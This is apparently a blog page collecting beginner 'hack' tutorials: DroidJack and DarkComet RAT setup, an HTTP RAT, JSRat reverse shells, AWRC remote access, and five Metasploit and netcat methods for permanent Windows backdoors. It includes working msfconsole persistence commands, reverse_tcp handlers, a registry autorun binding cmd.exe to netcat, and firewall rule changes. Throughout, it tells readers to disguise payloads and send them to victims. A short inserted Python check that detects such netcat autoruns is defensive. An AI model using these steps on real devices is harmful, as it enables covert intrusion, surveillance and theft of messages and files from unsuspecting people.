Showing posts with label Keylogger and Trojan. Show all posts

Hack Any Android Phone with DroidJack (Beginner's Guide)

DroidJack is an Android RAT that gives you the power to establish control over your victim's Android devices with an easy-to-use GUI and all the features you need to monitor them.


First of all, download DroidJack from http://droidjack.net/.


Now execute DroidJack, which is an executable JAR file. It will then prompt you to log in, so enter your username and password.


Now clicking on the Unlock button will open the GUI.


Now click on Generate APK and then edit App Name and File Name with the name of your choice so that it looks genuine. Also enter the IP of your system in the Dynamic DNS field and enter the port no. of your system in the Port Number field and then click on Generate.


After some time it will generate a prompt showing that the APK is successfully generated and can be found in the same folder as your DroidJack application.


Now go to Devices and set the port field in the lower left corner to the same port with which you generated the APK (in my case it is 1337), and then click on Reception to start the listening mode.


Now send the APK RAT to your victim by any means.


After installing the app, when the victim clicks on the button we will get the Android session.



As you can see below, the phone is listed in the Devices list.


Now right clicking on the mobile device will give a list of options which you can use.


Now, for demo purposes, I have used SMS Trekker, and as you can see it has dumped all the SMS.

HTTP RAT Tutorial for Beginners

HTTP RAT is a kind of Remote Access Trojan which utilizes web interfaces and port 80 to gain access. It can be understood simply as an HTTP tunnel, except it works in the reverse direction. These Trojans are comparatively more dangerous because they work over the web and thus work almost everywhere internet access is available.

Here we will be working with HTTP RAT backdoor webserver by zombie.


So download the above from the internet and extract the tool. It will look something like the picture below.


Double click on the folder and click on the icon with httprat written next to it. Something like this pic pops up on the screen.


Click on create. This is what should pop out on screen.


An icon less application with httpserver must be created as in this pic:


Send this file to the victim via pendrive or any other means. Once the victim double-clicks on the application, it will automatically send a connection back to you. You just need to type the victim’s IP address in the browser. This is what will come up on the screen.


5 ways to Create Permanent Backdoor in Remote PC

First take the meterpreter shell from any known exploit and bypass UAC for better results. Then run the command:

persistence

run persistence –X –i 10 –p 443 –r 192.168.0.105

-X=connect back when the system boots
-i 10=try to connect back every 10 seconds
-p 443=reverse connection port
-r ip=reverse connection ip
After successfully executing the script, reboot the system and then use exploit:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lport 443
set lhost 192.168.0.105

exploit


s4u_persistence


Now type use exploit/windows/local/s4u_persistence
msf exploit (s4u_persistence)>set payload windows/meterpreter/reverse_tcp
msf exploit (s4u_persistence)>set lhost 192.168.0.137 (IP address of kali Linux)
msf exploit (s4u_persistence)>set lport 443
msf exploit (s4u_persistence)>set trigger logon
msf exploit (s4u_persistence)>exploit

Now, after successful backdoor creation, restart the victim PC. You can see that the previous meterpreter session is closed. Then run the commands:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.137
exploit


VSS_PERSISTENCE
This module will attempt to create a persistent payload in a new volume shadow copy. This is based on the VSSOwn Script originally posted by Tim Tomes and Mark Baggett. This module has been tested successfully on Windows 7. In order to achieve persistence through the RUNKEY option, the user should need a password in order to start a session on the target machine.

First take the meterpreter shell and bypass UAC by any known technique, and then background the session. Then run this series of commands:

Now type use exploit/windows/local/vss_persistence
msf exploit (vss_persistence)>set runkey true
msf exploit (vss_persistence)>set schtask true
msf exploit (vss_persistence)>set rhost 192.168.222.137
msf exploit (vss_persistence)>set session 2
msf exploit (vss_persistence)>exploit 

Now run exploit which will create a backdoor and will give a meterpreter session. 


Now background it and use the multi handler and also set the payload with commands:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.222.135
set lport 4444
exploit

Now restart the victim system and the meterpreter session will die. Then run exploit; after the system has restarted, it will give a reverse meterpreter shell.


REGISTRY PERSISTENCE
This module will install a payload that is executed during boot. It will be executed either at user logon or system startup via the registry value in "CurrentVersion\Run" (depending on privilege and selected method). The payload will be installed completely in the registry.
First background the meterpreter session and then run the commands:

Now type use exploit/windows/local/registry_persistence
msf exploit (registry_persistence)>set payload windows/meterpreter/reverse_tcp
msf exploit (registry_persistence)>set lhost 192.168.222.135 (IP address of kali Linux)
msf exploit (registry_persistence)>set lport 4545
msf exploit (registry_persistence)>set startup system
msf exploit (registry_persistence)>set session 1
msf exploit (registry_persistence)>exploit


Now set up your system for reverse connection. Run the following commands on your msfconsole:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.222.135
set lport 4545
exploit

Now restart the victim PC and your previous meterpreter session will die, so now run the exploit.
After restarting you will get the reverse meterpreter shell, as you can see in my case.


NETCAT

Netcat is a featured networking utility which reads and writes data across network connections, using the TCP/IP protocol.

After getting the meterpreter shell and bypassing UAC run the following command:
upload /usr/share/windows-binaries/nc.exe C:\\Windows\\system32


Now set the registry value with the following command:
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v netcat -d 'C:\windows\system32\nc.exe -Ldp 4445 -e cmd.exe'


Now get the command shell with command:
Shell and then bypass the firewall on the victim system by adding firewall rules with shell command:
netsh advfirewall firewall add rule name=’netcat’ dir=in action=allow protocol=Tcp localport=4445


Now check whether the rules are added successfully with the command:
netsh firewall show portopening
As you can see, the firewall rule netcat is added successfully.


Now, after the victim system has restarted, run the following command in the terminal:
nc  -nv 192.168.0.101 4445
Here 192.168.0.101 is the victim system on which you previously created the backdoor, and 4445 is the port you gave while setting the registry value.
After successfully running the command you will get the command shell.
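
From a defender's side, the method above leaves two artifacts on the host: a value under the Run key and an inbound firewall rule for the listening port. The following check is an added example, not part of the original post: it parses saved output of reg query and netsh advfirewall firewall show rule name=all (both samples are constructed, and the function names are hypothetical) and flags autorun commands that listen on a port and hand a program to whoever connects.

```python
import re

# Constructed sample: `reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run`
RUN_KEY_OUTPUT = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    netcat    REG_SZ    C:\windows\system32\nc.exe -Ldp 4445 -e cmd.exe
"""
# Constructed sample: `netsh advfirewall firewall show rule name=all` (fields trimmed)
FIREWALL_OUTPUT = """
Rule Name:                            netcat
Enabled:                              Yes
Direction:                            In
LocalPort:                            4445
Action:                               Allow

Rule Name:                            Core Networking - DNS (UDP-Out)
Enabled:                              Yes
Direction:                            Out
LocalPort:                            Any
Action:                               Allow
"""
RUN_VALUE = re.compile(r"^\s{4}(.+?)\s{4}(REG_\w+)\s{4}(.+)$")
LISTEN = re.compile(r"\s-[a-zA-Z]*[lL][a-zA-Z]*\b")   # -l / -L, also bundled (-Ldp)
EXEC = re.compile(r"\s-e\s+\S+")                      # program handed to the peer
PORT = re.compile(r"\s-[a-zA-Z]*p\s+(\d+)")           # -p 4445 or bundled -Ldp 4445

def parse_run_values(text):  # (name, type, data) per value line of reg query output
    return [m.groups() for line in text.splitlines() if (m := RUN_VALUE.match(line))]

def inbound_allow_ports(text):  # local ports of enabled inbound allow rules
    ports = set()
    for block in re.split(r"\n\s*\n", text.strip()):
        f = dict(re.findall(r"^([^:\n]+):[ \t]*(.*)$", block, re.M))
        if (f.get("Enabled"), f.get("Direction"), f.get("Action")) == ("Yes", "In", "Allow"):
            ports.update(p.strip() for p in f.get("LocalPort", "").split(","))
    return ports

def find_listener_autoruns(run_text, fw_text):
    """Flag autoruns that listen and exec a program; note a matching firewall opening."""
    open_ports = inbound_allow_ports(fw_text)
    findings = []
    for name, _type, data in parse_run_values(run_text):
        if LISTEN.search(data) and EXEC.search(data):
            port = m.group(1) if (m := PORT.search(data)) else None
            findings.append({"value": name, "port": port, "firewall_open": port in open_ports})
    return findings

print(find_listener_autoruns(RUN_KEY_OUTPUT, FIREWALL_OUTPUT))
```

A finding with firewall_open set to True means the autorun listener and the rule that exposes it are both in place, which is the combination to triage first.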

Hack Windows Server in Network using Atelier Web Remote Command

Every geek, system administrator and help-desk employee loves being able to access computers or laptops remotely, but we also know that accessing a computer remotely normally requires installing the same software on the remote computer as well as on our own. Atelier Web Remote Commander (AWRC) is a powerful tool for geeks and system administrators because it can connect to other computers without installing any software or doing any configuration on the remote computer.
Atelier Web Remote Commander (AWRC) Features:
· Runs across firewalls.
· Performs deep audits and all kinds of maintenance operations.
· Does not leave traces on remote. It is absolutely safe.
· Zero configuration simultaneous connections.
Now let’s see the practical working of this tool.


Download Atelier Web Remote Commander, install it and open it.


In the Remote Host column, type the IP address of the computer or server to which you want a remote desktop connection, then give the User Name and Password and click on Connect.

After a few seconds, you can see the desktop of the remote computer appear in front of you. Now you can see information about the remote system and access the files of the remote computer.


Go to the SysInfo tab; here you see all information related to the remote computer, like the version of the running OS, BIOS information, details of memory, etc.


In NetworkInfo section, you will get most interesting information about the remote system like routing table, running protocols, open ports, IP statistics, etc.


FileSystem tab will give you access to file system of a remote computer, where you access all files and data on all drives.


The UserGroup section will give you details of all created accounts, their privileges, and the groups to which each user account belongs.


If you want to chat or tell something to remote computer user you can also do that, simply start Chat window and type whatever you want to say and hit enter.


OUTPUT of remote victims computer.


Hack Remote Windows 10 PC using JSRat

JSRAT is a simple JS reverse shell over HTTP for Windows. We run a web server and then execute commands against the connecting client/victim. So you can now run the attack server from any OS instead of being limited to a Windows OS with PowerShell enabled.

Open your kali Linux terminal and type the following command


https://github.com/Hood3dRob1n/JSRat-Py.git


Now go to the jsrat folder using cd JSRAT-Py and use the following command to run jsrat

./JSRAT.py  –i  192.168.0.140 –p 80 


Now the server is up and listening. Copy the Client Command link, i.e. http://192.168.0.140:80/wtf, and send it to the victim. When the victim opens the link in the browser, a snippet will appear like this.


Copy that snippet and paste in the cmd shell of victim.


As soon as the victim executes it you will get a reverse connection back in your kali terminal.

Hack Remote PC using DARKCOMET RAT with Metasploit

Download DarkComet RAT. After downloading DarkComet, unzip the archive file.

Set the location of DarkComet and type “wine DarkComet.exe”


First open DARKCOMET RAT and click on ‘I Accept’ (bottom right side of the screen)


In next screen click on DARKCOMET RAT then select Server module option and click on Minimalist


In this option it will display a form, fill the ID with your name, IP Address and desired Port No. Also add the destination path where you want to save the .exe file then click on Normal


Now save it on your desktop.


Again open DARKCOMET RAT and select listen to new port option


Now enter the port number used in the form above and click on Listen


Now hack the victim’s PC using Metasploit (see How to Hack Remote PC).
Now you’ll get a meterpreter session on the victim’s PC. Use the upload command to upload the backdoor exe file which you created using DarkComet.
Upload /root/Desktop/updates.exe d:\\
Now type shell to get the command prompt of the victim’s PC, and run the uploaded exe file.


Now you can get the session of victim’s PC. See the screenshot below:


Click on System Info to see the whole system information of the victim’s PC.